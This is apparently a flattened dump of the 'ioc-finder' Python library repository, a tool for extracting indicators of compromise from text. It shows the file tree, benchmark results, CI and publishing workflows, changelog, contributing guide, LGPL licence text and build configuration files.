├── .benchmarks └── Linux-CPython-3.10-64bit │ └── 0001_benchmark.json ├── .codacy.yml ├── .coveragerc ├── .editorconfig ├── .github ├── dependabot.yml └── workflows │ ├── ci.yml │ ├── docs.yml │ ├── lint.yml │ └── python-publish.yml ├── .gitignore ├── CHANGELOG.md ├── CONTRIBUTING.rst ├── COPYING ├── COPYING.LESSER ├── Dockerfile ├── MANIFEST.in ├── Makefile ├── README.md ├── docker-compose.yml ├── docker └── lint.sh ├── docs ├── development.md ├── index.md ├── overrides │ └── main.html └── quick-start.md ├── ioc_finder ├── __init__.py ├── data.py ├── ioc_finder.py └── ioc_grammars.py ├── mkdocs.yml ├── mypy.ini ├── pyproject.toml ├── requirements.txt ├── requirements_dev.txt ├── setup.cfg ├── setup.py ├── tests ├── __init__.py ├── benchmarks.py ├── data │ └── long-article-1.txt ├── find_iocs_cases │ ├── __init__.py │ ├── asns.py │ ├── attack_data.py │ ├── coins.py │ ├── cves.py │ ├── domains.py │ ├── email.py │ ├── feature__included_ioc_types.py │ ├── file_paths.py │ ├── hashes.py │ ├── ids.py │ ├── ip_addr.py │ ├── mac_addr.py │ ├── registry_keys.py │ ├── tlp_labels.py │ ├── urls.py │ └── user_agents.py ├── test_cli.py ├── test_concurrency.py ├── test_edge_cases.py ├── test_execution_time.py ├── test_find_iocs.py ├── test_ioc_finder.py ├── test_odd_ip_address_formats.py ├── test_parsing_functions.py ├── test_urls.py ├── test_utility_functions.py └── test_with_hypothesis.py └── utility.py /.benchmarks/Linux-CPython-3.10-64bit/0001_benchmark.json: -------------------------------------------------------------------------------- 1 | { 2 | "machine_info": { 3 | "node": "27a13e4be0d8", 4 | "processor": "", 5 | "machine": "x86_64", 6 | "python_compiler": "GCC 8.3.0", 7 | "python_implementation": "CPython", 8 | "python_implementation_version": "3.10.2", 9 | "python_version": "3.10.2", 10 | "python_build": [ 11 | "main", 12 | "Mar 2 2022 03:58:56" 13 | ], 14 | "release": "5.10.104-linuxkit", 15 | "system": "Linux", 16 | "cpu": { 17 | "python_version": "3.10.2.final.0 (64 
bit)", 18 | "cpuinfo_version": [ 19 | 9, 20 | 0, 21 | 0 22 | ], 23 | "cpuinfo_version_string": "9.0.0", 24 | "arch": "X86_64", 25 | "bits": 64, 26 | "count": 2, 27 | "arch_string_raw": "x86_64", 28 | "vendor_id_raw": "GenuineIntel", 29 | "brand_raw": "Intel(R) Core(TM) i7-5650U CPU @ 2.20GHz", 30 | "hz_advertised_friendly": "2.2000 GHz", 31 | "hz_actual_friendly": "2.1983 GHz", 32 | "hz_advertised": [ 33 | 2200000000, 34 | 0 35 | ], 36 | "hz_actual": [ 37 | 2198316000, 38 | 0 39 | ], 40 | "stepping": 4, 41 | "model": 61, 42 | "family": 6, 43 | "flags": [ 44 | "3dnowprefetch", 45 | "abm", 46 | "aes", 47 | "apic", 48 | "arat", 49 | "avx", 50 | "avx2", 51 | "bmi1", 52 | "bmi2", 53 | "clflush", 54 | "cmov", 55 | "constant_tsc", 56 | "cpuid", 57 | "cx16", 58 | "cx8", 59 | "de", 60 | "ds_cpl", 61 | "dtes64", 62 | "erms", 63 | "f16c", 64 | "fma", 65 | "fpu", 66 | "fsgsbase", 67 | "fxsr", 68 | "hle", 69 | "ht", 70 | "hypervisor", 71 | "lahf_lm", 72 | "lm", 73 | "mca", 74 | "mce", 75 | "mmx", 76 | "movbe", 77 | "msr", 78 | "mtrr", 79 | "nonstop_tsc", 80 | "nopl", 81 | "nx", 82 | "osxsave", 83 | "pae", 84 | "pat", 85 | "pbe", 86 | "pcid", 87 | "pclmulqdq", 88 | "pdpe1gb", 89 | "pge", 90 | "pni", 91 | "popcnt", 92 | "pse", 93 | "pse36", 94 | "rdrand", 95 | "rdrnd", 96 | "rep_good", 97 | "rtm", 98 | "sdbg", 99 | "sep", 100 | "ss", 101 | "sse", 102 | "sse2", 103 | "sse4_1", 104 | "sse4_2", 105 | "ssse3", 106 | "syscall", 107 | "tsc", 108 | "vme", 109 | "xsave", 110 | "xsaveopt", 111 | "xtopology", 112 | "xtpr" 113 | ], 114 | "l3_cache_size": 4194304, 115 | "l2_cache_size": 262144, 116 | "l1_data_cache_size": 32768, 117 | "l1_instruction_cache_size": 32768, 118 | "l2_cache_line_size": 256, 119 | "l2_cache_associativity": 6 120 | } 121 | }, 122 | "commit_info": { 123 | "id": "3ec2e9bf011ed508b7994ac1dafc94d73d0f2269", 124 | "time": "2022-07-08T04:22:31-04:00", 125 | "author_time": "2022-07-08T04:22:31-04:00", 126 | "dirty": true, 127 | "project": "ioc-finder", 128 | "branch": 
"main" 129 | }, 130 | "benchmarks": [ 131 | { 132 | "group": null, 133 | "name": "test_benchmarks", 134 | "fullname": "code/tests/benchmarks.py::test_benchmarks", 135 | "params": null, 136 | "param": null, 137 | "extra_info": {}, 138 | "options": { 139 | "disable_gc": false, 140 | "timer": "perf_counter", 141 | "min_rounds": 5, 142 | "max_time": 1.0, 143 | "min_time": 5e-06, 144 | "warmup": false 145 | }, 146 | "stats": { 147 | "min": 6.62307798400002, 148 | "max": 11.762176740999962, 149 | "mean": 7.822174038599973, 150 | "stddev": 2.210649363715684, 151 | "rounds": 5, 152 | "median": 7.011211251999953, 153 | "iqr": 1.5581442862500126, 154 | "q1": 6.661986278499967, 155 | "q3": 8.22013056474998, 156 | "iqr_outliers": 1, 157 | "stddev_outliers": 1, 158 | "outliers": "1;1", 159 | "ld15iqr": 6.62307798400002, 160 | "hd15iqr": 11.762176740999962, 161 | "ops": 0.12784169657505878, 162 | "total": 39.11087019299987, 163 | "iterations": 1 164 | } 165 | }, 166 | { 167 | "group": null, 168 | "name": "test_parse_urls", 169 | "fullname": "code/tests/benchmarks.py::test_parse_urls", 170 | "params": null, 171 | "param": null, 172 | "extra_info": {}, 173 | "options": { 174 | "disable_gc": false, 175 | "timer": "perf_counter", 176 | "min_rounds": 5, 177 | "max_time": 1.0, 178 | "min_time": 5e-06, 179 | "warmup": false 180 | }, 181 | "stats": { 182 | "min": 0.5990572059999977, 183 | "max": 0.6238025569999763, 184 | "mean": 0.6069684945999825, 185 | "stddev": 0.010547151800779047, 186 | "rounds": 5, 187 | "median": 0.6011302180000939, 188 | "iqr": 0.014412642249965302, 189 | "q1": 0.5997208337499558, 190 | "q3": 0.6141334759999211, 191 | "iqr_outliers": 0, 192 | "stddev_outliers": 1, 193 | "outliers": "1;0", 194 | "ld15iqr": 0.5990572059999977, 195 | "hd15iqr": 0.6238025569999763, 196 | "ops": 1.6475319705993006, 197 | "total": 3.0348424729999124, 198 | "iterations": 1 199 | } 200 | } 201 | ], 202 | "datetime": "2022-11-03T09:41:08.251239", 203 | "version": "3.4.1" 204 | } 
-------------------------------------------------------------------------------- /.codacy.yml: -------------------------------------------------------------------------------- 1 | exclude_paths: 2 | - tests/** -------------------------------------------------------------------------------- /.coveragerc: -------------------------------------------------------------------------------- 1 | [run] 2 | omit = 3 | .tox/* 4 | tests/* 5 | setup.py 6 | utility.py 7 | -------------------------------------------------------------------------------- /.editorconfig: -------------------------------------------------------------------------------- 1 | # http://editorconfig.org 2 | 3 | root = true 4 | 5 | [*] 6 | indent_style = space 7 | indent_size = 4 8 | trim_trailing_whitespace = true 9 | insert_final_newline = true 10 | charset = utf-8 11 | end_of_line = lf 12 | 13 | [*.bat] 14 | indent_style = tab 15 | end_of_line = crlf 16 | 17 | [LICENSE] 18 | insert_final_newline = false 19 | 20 | [Makefile] 21 | indent_style = tab 22 | 23 | [{.travis.yml}] 24 | indent_style = space 25 | indent_size = 2 26 | -------------------------------------------------------------------------------- /.github/dependabot.yml: -------------------------------------------------------------------------------- 1 | version: 2 2 | updates: 3 | - package-ecosystem: "pip" 4 | directory: "/" 5 | schedule: 6 | interval: "weekly" 7 | -------------------------------------------------------------------------------- /.github/workflows/ci.yml: -------------------------------------------------------------------------------- 1 | # This workflow will install Python dependencies, run tests and lint with a variety of Python versions 2 | # For more information see: https://help.github.com/actions/language-and-framework-guides/using-python-with-github-actions 3 | 4 | name: CI 5 | 6 | on: 7 | push: 8 | branches: [ main ] 9 | pull_request: 10 | branches: [ main ] 11 | 12 | jobs: 13 | build_multi_os: 14 | runs-on: ${{ matrix.os 
}} 15 | strategy: 16 | matrix: 17 | os: [macos-latest, windows-latest, ubuntu-latest] 18 | python-version: ['3.10'] 19 | 20 | steps: 21 | - uses: actions/checkout@v2 22 | - name: Set up Python ${{ matrix.python-version }} 23 | uses: actions/setup-python@v2 24 | with: 25 | python-version: ${{ matrix.python-version }} 26 | - name: Install dependencies 27 | run: | 28 | python -m pip install -r requirements.txt 29 | python -m pip install -r requirements_dev.txt 30 | - name: Run pytest 31 | run: | 32 | pytest 33 | codecov 34 | # run benchmark tests 35 | pytest -c "." --benchmark-storage=.benchmarks/Linux-CPython-3.10-64bit/ --benchmark-compare=0001 --benchmark-compare-fail=mean:10% --benchmark-columns='mean,median,stddev,iqr' tests/benchmarks.py 36 | 37 | build_multi_py_versions: 38 | runs-on: ${{ matrix.os }} 39 | strategy: 40 | matrix: 41 | os: [ubuntu-latest] 42 | python-version: ['3.7', '3.8', '3.9', '3.10'] 43 | 44 | steps: 45 | - uses: actions/checkout@v2 46 | - name: Set up Python ${{ matrix.python-version }} 47 | uses: actions/setup-python@v2 48 | with: 49 | python-version: ${{ matrix.python-version }} 50 | - name: Install dependencies 51 | run: | 52 | python -m pip install -r requirements.txt 53 | python -m pip install -r requirements_dev.txt 54 | - name: Run pytest 55 | run: | 56 | pytest 57 | codecov 58 | -------------------------------------------------------------------------------- /.github/workflows/docs.yml: -------------------------------------------------------------------------------- 1 | name: Docs 2 | 3 | on: 4 | push: 5 | branches: [ main ] 6 | 7 | jobs: 8 | mkdocs-deploy: 9 | runs-on: ubuntu-latest 10 | steps: 11 | - uses: actions/checkout@v2 12 | - uses: actions/setup-python@v2 13 | with: 14 | python-version: 3.x 15 | - run: pip install mkdocs-material 16 | - run: mkdocs gh-deploy --force 17 | -------------------------------------------------------------------------------- /.github/workflows/lint.yml: 
-------------------------------------------------------------------------------- 1 | # This workflow will install Python dependencies, run tests and lint with a variety of Python versions 2 | # For more information see: https://help.github.com/actions/language-and-framework-guides/using-python-with-github-actions 3 | 4 | name: Lint 5 | 6 | on: 7 | push: 8 | branches: [ main ] 9 | pull_request: 10 | branches: [ main ] 11 | 12 | jobs: 13 | build: 14 | runs-on: ubuntu-latest 15 | steps: 16 | - uses: actions/checkout@v2 17 | - name: Set up Python 18 | uses: actions/setup-python@v2 19 | with: 20 | python-version: '3.10' 21 | - name: Install dependencies 22 | run: | 23 | python -m pip install -r requirements.txt 24 | python -m pip install -r requirements_dev.txt 25 | - name: Lint 26 | env: 27 | CONTEXT: ci 28 | run: ./docker/lint.sh 29 | -------------------------------------------------------------------------------- /.github/workflows/python-publish.yml: -------------------------------------------------------------------------------- 1 | # This workflow will upload a Python Package using Twine when a release is created 2 | # For more information see: https://help.github.com/en/actions/language-and-framework-guides/using-python-with-github-actions#publishing-to-package-registries 3 | 4 | name: Upload Python Package to PyPi 5 | 6 | on: 7 | push: 8 | tags: 9 | - 'v*' 10 | 11 | jobs: 12 | deploy: 13 | 14 | runs-on: ubuntu-latest 15 | 16 | steps: 17 | - uses: actions/checkout@v2 18 | - name: Set up Python 19 | uses: actions/setup-python@v2 20 | with: 21 | python-version: '3.x' 22 | - name: Install dependencies 23 | run: | 24 | python -m pip install --upgrade pip 25 | pip install setuptools wheel twine 26 | - name: Build and publish 27 | env: 28 | TWINE_USERNAME: ${{ secrets.PYPI_USERNAME }} 29 | TWINE_PASSWORD: ${{ secrets.PYPI_PASSWORD }} 30 | run: | 31 | python setup.py sdist bdist_wheel 32 | twine upload dist/* 33 | 
-------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | # Byte-compiled / optimized / DLL files 2 | __pycache__/ 3 | *.py[cod] 4 | *$py.class 5 | 6 | # C extensions 7 | *.so 8 | 9 | # Distribution / packaging 10 | .Python 11 | env/ 12 | build/ 13 | develop-eggs/ 14 | dist/ 15 | downloads/ 16 | eggs/ 17 | .eggs/ 18 | lib/ 19 | lib64/ 20 | parts/ 21 | sdist/ 22 | var/ 23 | *.egg-info/ 24 | .installed.cfg 25 | *.egg 26 | 27 | # PyInstaller 28 | # Usually these files are written by a python script from a template 29 | # before PyInstaller builds the exe, so as to inject date/other infos into it. 30 | *.manifest 31 | *.spec 32 | 33 | # Installer logs 34 | pip-log.txt 35 | pip-delete-this-directory.txt 36 | 37 | # Unit test / coverage reports 38 | htmlcov/ 39 | .tox/ 40 | .coverage 41 | .coverage.* 42 | .cache 43 | nosetests.xml 44 | coverage.xml 45 | *,cover 46 | .hypothesis/ 47 | 48 | # Translations 49 | *.mo 50 | *.pot 51 | 52 | # Django stuff: 53 | *.log 54 | 55 | # Sphinx documentation 56 | docs/_build/ 57 | 58 | # PyBuilder 59 | target/ 60 | 61 | # pyenv python configuration file 62 | .python-version 63 | 64 | # Cookie cutter packaging file 65 | travis_pypi_setup.py 66 | Pipfile 67 | Pipfile.lock 68 | -------------------------------------------------------------------------------- /CHANGELOG.md: -------------------------------------------------------------------------------- 1 | # Changelog 2 | 3 | All notable changes to this project will be documented in this file. 4 | 5 | The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/), and this project adheres to [Semantic Versioning](https://semver.org/). 
6 | 7 | ## [7.3.0] - 2022.12.22 8 | 9 | ### Changed 10 | 11 | - To speed URL parsing, we no longer parse URLs with `userinfo "@"` in the authority (see [URL syntax guide for more details](https://en.wikipedia.org/wiki/URL#Syntax)) 12 | - Our reasoning is that userinfo is rarely present 13 | - If you have concerns about this change or would like to see it added back in (it could be optionally enabled), please raise an issue 14 | 15 | ## [7.2.4] - 2022.08.25 16 | 17 | ### Fixed 18 | 19 | - URL boundary to better respect the conventions of human language regarding quotation marks and parentheses ([#130](https://github.com/fhightower/ioc-finder/issues/130)) 20 | 21 | ## [7.2.3] - 2022.07.14 22 | 23 | ### Fixed 24 | 25 | - Update required version of [ioc-fanger](https://github.com/ioc-fang/ioc-fanger) which fixes issues with non-http(s) URL schemes ([#255](https://github.com/fhightower/ioc-finder/issues/255)) 26 | 27 | ## [7.2.2] - 2022.07.08 28 | 29 | ### Fixed 30 | 31 | - Poorly designed grammars which were SIGNIFICANTLY slowing down this project ([#250](https://github.com/fhightower/ioc-finder/pull/250)) 32 | - **🎉 This update improves mean run-times by [≈70%](https://github.com/fhightower/ioc-finder/pull/253/files#diff-8e67b346e4b32f0cd637dbd271c16ab649c05fdf6aa7fe443cc85c0d8ca6ad07R149)!** 33 | - Thanks to @ptmcg for his contribution! 
34 | 35 | ## [7.2.1] - 2022.07.05 36 | 37 | ### Fixed 38 | 39 | - Removed duplicative function calls 40 | 41 | ## [7.2.0] - 2022.06.20 42 | 43 | ### Changed 44 | 45 | - *Possible breaking change:* Update required pyparsing version to [v3](https://github.com/pyparsing/pyparsing/blob/966d6fded149c6c11993746b0d72166bc04e4504/CHANGES#L49) 46 | - Although there are no public API changes associated with this version, this may be a breaking change if you are using ioc-finder and have pyparsing pinned to a version less than v3 47 | - I've chosen to release this as a new minor version b/c I think requirement version updates w/ no API changes and no system requirement changes constitute a minor version change 48 | - Updated parsing of Google Analytics Tracker IDs so that matches must be all lower-cased or all upper-cased (e.g. `ua-...` and `UA-...` will be matched, but `uA-...` will not) (this makes the parsing consistent with how Google Adsense Publisher IDs are parsed) 49 | 50 | ## [7.1.0] - 2022.06.13 51 | 52 | ### Added 53 | 54 | - `included_ioc_types` option to only parse specified IOC types ([#218](https://github.com/fhightower/ioc-finder/issues/218)) 55 | 56 | ### Changed 57 | 58 | - Imphashes are no longer parsed as md5s even when `parse_imphashes` is False ([#231](https://github.com/fhightower/ioc-finder/issues/231)) 59 | - Authentihashes are no longer parsed as sha256s even when `parse_authentihashes` is False ([#231](https://github.com/fhightower/ioc-finder/issues/231)) 60 | 61 | ## [7.0.0] - 2022.05.27 62 | 63 | ### Added 64 | 65 | - Support for Python 3.10 ([#188](https://github.com/fhightower/ioc-finder/issues/188)) 66 | 67 | ### Removed 68 | 69 | - Phone number parsing ([#155](https://github.com/fhightower/ioc-finder/issues/155)) 70 | - Support for Python 3.6 ([#187](https://github.com/fhightower/ioc-finder/issues/187)) 71 | 72 | ## [6.0.1] - 2021.06.09 73 | 74 | ### Fixed 75 | 76 | - ASN grammar improved to reduce false positives by not matching on lower-case
`"as "` ([#136](https://github.com/fhightower/ioc-finder/issues/136)) 77 | 78 | ## [6.0.0] - 2021.05.20 79 | 80 | ### Changed 81 | 82 | - Made all boolean arguments keyword-only arguments ([#108](https://github.com/fhightower/ioc-finder/issues/108)) 83 | - Converting data from lists to tuples ([#110](https://github.com/fhightower/ioc-finder/issues/110)) 84 | - Made `_prepare_text` function public (`prepare_text`) ([#114](https://github.com/fhightower/ioc-finder/issues/114)) 85 | - Renamed `no_urls_without_schemes` to `parse_urls_without_scheme` ([#109](https://github.com/fhightower/ioc-finder/issues/109)) 86 | - Moved from MIT License to [GNU Lesser General Public License v3.0](https://choosealicense.com/licenses/lgpl-3.0/) ([#113](https://github.com/fhightower/ioc-finder/issues/113)) 87 | 88 | ### Fixed 89 | 90 | - Unquoting URLs appropriately ([#104](https://github.com/fhightower/ioc-finder/issues/104)) 91 | - Pinned specific [ioc-fanger](https://github.com/ioc-fang/ioc-fanger) version (this prevents an error where ioc-fanger was removing a URL in the query parameter of another URL - see [#104](https://github.com/fhightower/ioc-finder/issues/104)) 92 | 93 | ## [5.0.3] - 2021.04.09 94 | 95 | ### Fixed 96 | 97 | - Unquoting URLs appropriately ([#104](https://github.com/fhightower/ioc-finder/issues/104)) 98 | - Pinned specific [ioc-fanger](https://github.com/ioc-fang/ioc-fanger) version (this prevents an error where ioc-fanger was removing a URL in the query parameter of another URL - see [#104](https://github.com/fhightower/ioc-finder/issues/104)) 99 | 100 | ## [5.0.2] - 2021.04.02 101 | 102 | ### Changed 103 | 104 | - [Improved URL grammar](https://github.com/fhightower/ioc-finder/commit/e3025c1a578663f693e7aa7947ac56e577dde0e9) 105 | 106 | ### Fixed 107 | 108 | - Updating library such that CIDR ranges are not detected as URLs when `parse_urls_without_scheme=True` (see [#91](https://github.com/fhightower/ioc-finder/issues/91)) 109 | - Parse observables from URL 
path when `parse_domain_from_url=False` and `parse_from_url_path=True` (see [#90](https://github.com/fhightower/ioc-finder/issues/90)) 110 | 111 | ## [5.0.1] - 2021.01.11 112 | 113 | ### Changed 114 | 115 | - Improved word boundary (specifically of MAC address and IP address grammars) 116 | 117 | ## [5.0.0] - 2020.09.25 118 | 119 | ### Removed 120 | 121 | - Concurrency (through the use of concurrent.futures) 122 | 123 | ## [4.0.2] - 2020.09.18 124 | 125 | ### Added 126 | 127 | - Added parsing Monero addresses (see #94) 128 | 129 | ### Changed 130 | 131 | - Simplifying `_remove_url_paths` (a function used behind the scenes by the ioc finder - see #70) 132 | - Created a function to update top level domains (see #10) 133 | - Updating top level domains (which are used in grammars to find network observables) 134 | 135 | ## [4.0.1] - 2020.09.11 136 | 137 | ### Changed 138 | 139 | - You can now ingest text using the cli. For example, this now works: `cat foo.text | ioc-finder`. 140 | - We now have 100% code coverage!!! 141 | - Adding more keywords so this package is easier to find in pypi 142 | 143 | ## [4.0.0] - 2020.09.09 144 | 145 | ### Changed 146 | 147 | - We are now parsing observables from URL paths by default (see https://github.com/fhightower/ioc-finder/issues/87). If you would like to disable this functionality, you may do so by setting the `parse_from_url_path` keyword argument to `False` when calling the `find_iocs` function (e.g. `parse_from_url_path=False`). 148 | 149 | ## <= 3.1.2 - 2020.08.29 150 | 151 | The change log was added for version 3.1.2 152 | -------------------------------------------------------------------------------- /CONTRIBUTING.rst: -------------------------------------------------------------------------------- 1 | .. highlight:: shell 2 | 3 | ************ 4 | Contributing 5 | ************ 6 | 7 | Contributions are welcome, and they are greatly appreciated! Every 8 | little bit helps, and credit will always be given. 
9 | 10 | You can contribute in many ways: 11 | 12 | Types of Contributions 13 | ====================== 14 | 15 | Report Bugs 16 | ----------- 17 | 18 | Report bugs at https://github.com/fhightower/ioc-finder/issues. 19 | 20 | If you are reporting a bug, please include: 21 | 22 | * Your operating system name and version. 23 | * Any details about your local setup that might be helpful in troubleshooting. 24 | * Detailed steps to reproduce the bug. 25 | 26 | Fix Bugs 27 | -------- 28 | 29 | Look through the GitHub issues for bugs. Anything tagged with "bug" 30 | and "help wanted" is open to whoever wants to implement it. 31 | 32 | Implement Features 33 | ------------------ 34 | 35 | Look through the GitHub issues for features. Anything tagged with "enhancement" 36 | and "help wanted" is open to whoever wants to implement it. 37 | 38 | Write Documentation 39 | ------------------- 40 | 41 | IOC Finder could always use more documentation, whether as part of the 42 | official IOC Finder docs, in docstrings, or even on the web in blog posts, 43 | articles, and such. 44 | 45 | Submit Feedback 46 | --------------- 47 | 48 | The best way to send feedback is to file an issue at https://github.com/fhightower/ioc-finder/issues. 49 | 50 | If you are proposing a feature: 51 | 52 | * Explain in detail how it would work. 53 | * Keep the scope as narrow as possible, to make it easier to implement. 54 | * Remember that this is a volunteer-driven project, and that contributions 55 | are welcome :) 56 | 57 | Get Started! 58 | ============== 59 | 60 | Ready to contribute? Here's how to set up `ioc_finder` for local development. 61 | 62 | 1. Fork the `ioc_finder` repo on GitHub. 63 | 2. Clone your fork locally:: 64 | 65 | $ git clone git@github.com:your_name_here/ioc_finder.git 66 | 67 | 3. Install your local copy into a virtualenv.
Assuming you have virtualenvwrapper installed, this is how you set up your fork for local development:: 68 | 69 | $ mkvirtualenv ioc_finder 70 | $ cd ioc_finder/ 71 | $ python setup.py develop 72 | 73 | 4. Create a branch for local development:: 74 | 75 | $ git checkout -b name-of-your-bugfix-or-feature 76 | 77 | Now you can make your changes locally. 78 | 79 | 5. When you're done making changes, check that your changes pass flake8 and the tests, including testing other Python versions with tox:: 80 | 81 | $ flake8 ioc_finder tests 82 | $ python setup.py test or py.test 83 | $ tox 84 | 85 | To get flake8 and tox, just pip install them into your virtualenv. 86 | 87 | 6. Commit your changes and push your branch to GitHub:: 88 | 89 | $ git add . 90 | $ git commit -m "Your detailed description of your changes." 91 | $ git push origin name-of-your-bugfix-or-feature 92 | 93 | 7. Submit a pull request through the GitHub website. 94 | 95 | Pull Request Guidelines 96 | ======================= 97 | 98 | Before you submit a pull request, check that it meets these guidelines: 99 | 100 | 1. The pull request should include tests. 101 | 2. If the pull request adds functionality, the docs should be updated. Put 102 | your new functionality into a function with a docstring, and add the 103 | feature to the list in README.md. 104 | 3. The pull request should work for Python 3.7, 3.8, 3.9 and 3.10. Check 105 | https://github.com/fhightower/ioc-finder/actions 106 | and make sure that the tests pass for all supported Python versions. 107 | 108 | Tips 109 | ---- 110 | 111 | To run a subset of tests:: 112 | 113 | $ py.test tests/test_ioc_finder.py 114 | 115 | -------------------------------------------------------------------------------- /COPYING.LESSER: -------------------------------------------------------------------------------- 1 | GNU LESSER GENERAL PUBLIC LICENSE 2 | Version 3, 29 June 2007 3 | 4 | Copyright (C) 2007 Free Software Foundation, Inc.
5 | Everyone is permitted to copy and distribute verbatim copies 6 | of this license document, but changing it is not allowed. 7 | 8 | 9 | This version of the GNU Lesser General Public License incorporates 10 | the terms and conditions of version 3 of the GNU General Public 11 | License, supplemented by the additional permissions listed below. 12 | 13 | 0. Additional Definitions. 14 | 15 | As used herein, "this License" refers to version 3 of the GNU Lesser 16 | General Public License, and the "GNU GPL" refers to version 3 of the GNU 17 | General Public License. 18 | 19 | "The Library" refers to a covered work governed by this License, 20 | other than an Application or a Combined Work as defined below. 21 | 22 | An "Application" is any work that makes use of an interface provided 23 | by the Library, but which is not otherwise based on the Library. 24 | Defining a subclass of a class defined by the Library is deemed a mode 25 | of using an interface provided by the Library. 26 | 27 | A "Combined Work" is a work produced by combining or linking an 28 | Application with the Library. The particular version of the Library 29 | with which the Combined Work was made is also called the "Linked 30 | Version". 31 | 32 | The "Minimal Corresponding Source" for a Combined Work means the 33 | Corresponding Source for the Combined Work, excluding any source code 34 | for portions of the Combined Work that, considered in isolation, are 35 | based on the Application, and not on the Linked Version. 36 | 37 | The "Corresponding Application Code" for a Combined Work means the 38 | object code and/or source code for the Application, including any data 39 | and utility programs needed for reproducing the Combined Work from the 40 | Application, but excluding the System Libraries of the Combined Work. 41 | 42 | 1. Exception to Section 3 of the GNU GPL. 43 | 44 | You may convey a covered work under sections 3 and 4 of this License 45 | without being bound by section 3 of the GNU GPL. 
46 | 47 | 2. Conveying Modified Versions. 48 | 49 | If you modify a copy of the Library, and, in your modifications, a 50 | facility refers to a function or data to be supplied by an Application 51 | that uses the facility (other than as an argument passed when the 52 | facility is invoked), then you may convey a copy of the modified 53 | version: 54 | 55 | a) under this License, provided that you make a good faith effort to 56 | ensure that, in the event an Application does not supply the 57 | function or data, the facility still operates, and performs 58 | whatever part of its purpose remains meaningful, or 59 | 60 | b) under the GNU GPL, with none of the additional permissions of 61 | this License applicable to that copy. 62 | 63 | 3. Object Code Incorporating Material from Library Header Files. 64 | 65 | The object code form of an Application may incorporate material from 66 | a header file that is part of the Library. You may convey such object 67 | code under terms of your choice, provided that, if the incorporated 68 | material is not limited to numerical parameters, data structure 69 | layouts and accessors, or small macros, inline functions and templates 70 | (ten or fewer lines in length), you do both of the following: 71 | 72 | a) Give prominent notice with each copy of the object code that the 73 | Library is used in it and that the Library and its use are 74 | covered by this License. 75 | 76 | b) Accompany the object code with a copy of the GNU GPL and this license 77 | document. 78 | 79 | 4. Combined Works. 
80 | 81 | You may convey a Combined Work under terms of your choice that, 82 | taken together, effectively do not restrict modification of the 83 | portions of the Library contained in the Combined Work and reverse 84 | engineering for debugging such modifications, if you also do each of 85 | the following: 86 | 87 | a) Give prominent notice with each copy of the Combined Work that 88 | the Library is used in it and that the Library and its use are 89 | covered by this License. 90 | 91 | b) Accompany the Combined Work with a copy of the GNU GPL and this license 92 | document. 93 | 94 | c) For a Combined Work that displays copyright notices during 95 | execution, include the copyright notice for the Library among 96 | these notices, as well as a reference directing the user to the 97 | copies of the GNU GPL and this license document. 98 | 99 | d) Do one of the following: 100 | 101 | 0) Convey the Minimal Corresponding Source under the terms of this 102 | License, and the Corresponding Application Code in a form 103 | suitable for, and under terms that permit, the user to 104 | recombine or relink the Application with a modified version of 105 | the Linked Version to produce a modified Combined Work, in the 106 | manner specified by section 6 of the GNU GPL for conveying 107 | Corresponding Source. 108 | 109 | 1) Use a suitable shared library mechanism for linking with the 110 | Library. A suitable mechanism is one that (a) uses at run time 111 | a copy of the Library already present on the user's computer 112 | system, and (b) will operate properly with a modified version 113 | of the Library that is interface-compatible with the Linked 114 | Version. 
115 | 116 | e) Provide Installation Information, but only if you would otherwise 117 | be required to provide such information under section 6 of the 118 | GNU GPL, and only to the extent that such information is 119 | necessary to install and execute a modified version of the 120 | Combined Work produced by recombining or relinking the 121 | Application with a modified version of the Linked Version. (If 122 | you use option 4d0, the Installation Information must accompany 123 | the Minimal Corresponding Source and Corresponding Application 124 | Code. If you use option 4d1, you must provide the Installation 125 | Information in the manner specified by section 6 of the GNU GPL 126 | for conveying Corresponding Source.) 127 | 128 | 5. Combined Libraries. 129 | 130 | You may place library facilities that are a work based on the 131 | Library side by side in a single library together with other library 132 | facilities that are not Applications and are not covered by this 133 | License, and convey such a combined library under terms of your 134 | choice, if you do both of the following: 135 | 136 | a) Accompany the combined library with a copy of the same work based 137 | on the Library, uncombined with any other library facilities, 138 | conveyed under the terms of this License. 139 | 140 | b) Give prominent notice with the combined library that part of it 141 | is a work based on the Library, and explaining where to find the 142 | accompanying uncombined form of the same work. 143 | 144 | 6. Revised Versions of the GNU Lesser General Public License. 145 | 146 | The Free Software Foundation may publish revised and/or new versions 147 | of the GNU Lesser General Public License from time to time. Such new 148 | versions will be similar in spirit to the present version, but may 149 | differ in detail to address new problems or concerns. 150 | 151 | Each version is given a distinguishing version number. 
If the 152 | Library as you received it specifies that a certain numbered version 153 | of the GNU Lesser General Public License "or any later version" 154 | applies to it, you have the option of following the terms and 155 | conditions either of that published version or of any later version 156 | published by the Free Software Foundation. If the Library as you 157 | received it does not specify a version number of the GNU Lesser 158 | General Public License, you may choose any version of the GNU Lesser 159 | General Public License ever published by the Free Software Foundation. 160 | 161 | If the Library as you received it specifies that a proxy can decide 162 | whether future versions of the GNU Lesser General Public License shall 163 | apply, that proxy's public statement of acceptance of any version is 164 | permanent authorization for you to choose that version for the 165 | Library. -------------------------------------------------------------------------------- /Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:3.10.2-buster 2 | 3 | ENV PIP_NO_CACHE_DIR "true" 4 | 5 | COPY ./requirements*.txt /code/ 6 | 7 | WORKDIR /code 8 | 9 | RUN pip install -r requirements.txt -r requirements_dev.txt 10 | -------------------------------------------------------------------------------- /MANIFEST.in: -------------------------------------------------------------------------------- 1 | include CONTRIBUTING.rst 2 | include COPYING 3 | include COPYING.LESSER 4 | include README.md 5 | 6 | recursive-include tests * 7 | recursive-exclude * __pycache__ 8 | recursive-exclude * *.py[co] 9 | 10 | recursive-include docs *.rst conf.py Makefile make.bat *.jpg *.png *.gif -------------------------------------------------------------------------------- /Makefile: -------------------------------------------------------------------------------- 1 | .PHONY: clean clean-test clean-pyc clean-build docs help 2 | .DEFAULT_GOAL := help 3 
